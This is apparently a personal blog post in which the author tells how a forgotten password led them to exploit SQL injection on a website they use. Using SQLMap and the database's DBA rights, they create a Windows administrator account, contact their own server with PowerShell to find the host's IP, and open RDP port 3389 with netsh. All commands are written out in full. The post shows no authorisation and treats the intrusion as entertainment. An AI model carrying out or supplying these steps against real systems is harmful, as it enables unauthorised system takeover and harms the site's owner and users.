Forgot Password to System Takeover
The best thing about having a Hacker mind and Programmer mind is that you can find enjoyment everywhere.
Thanks to Muhammad Osman for helping a lot with this thing.
After about 6 months, I was trying to check my documents and settings on a website. I figured out I forgot my password and can’t log into the site and guess what, there was no such option as “forgot password”.
I randomly entered a quote (‘) just to test if somehow it is vulnerable to SQL injection. And Boooom! I got an SQL error.
I ran into GitHub and downloaded SQLMap to not waste time and get better results in no time. Instead of wasting time on database enumeration etc I checked if the user is DBA or not and yeah another excitement the user is DBA.
Let’s create a user and add it to the administrator’s group.
net user /add test pass1234net localgroup administrators test /add
Now lets log into the system using RDP.
Oh Crap! We do not have such a user on the server, but it shows the user on the list. I had a sudden feeling, what if this is not the same server where the database is hosted, what if it is a different server. and yeah I was correct, the database was on a different server.
Now the mission is to find the IP address of the respective server. From a little google search, I found that through a PowerShell command we can do web requests. so I created a subdomain on my website and coded a PHP script which will capture the IP address of the visitor and User-Agent of the visitor for confirmation if it is visited by a user, google or a PowerShell. I tried the following command.
powershell -Command "Invoke-WebRequest http://www.foo.com/"
Hurrah! we got the IP address, now lets login to the RDP through this IP address.
Crap! again, what the hell happened again. We have everything, then why can’t we just simply log in. Oh Wait! can it be that port is not open.
Let’s open ports using netsh command.
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389Now let’s login to RDP.
I am lazy as hell and have an exam starting tomorrow. I wished to write the next amazing part in this article as well (to take over the database server) but will leave it for now.
Happy Hacking
I am a Top Rated Freelancer on Upwork working as Python and Java Developer, if you need any scraping or automation services, do refer to me the projects. Thank You
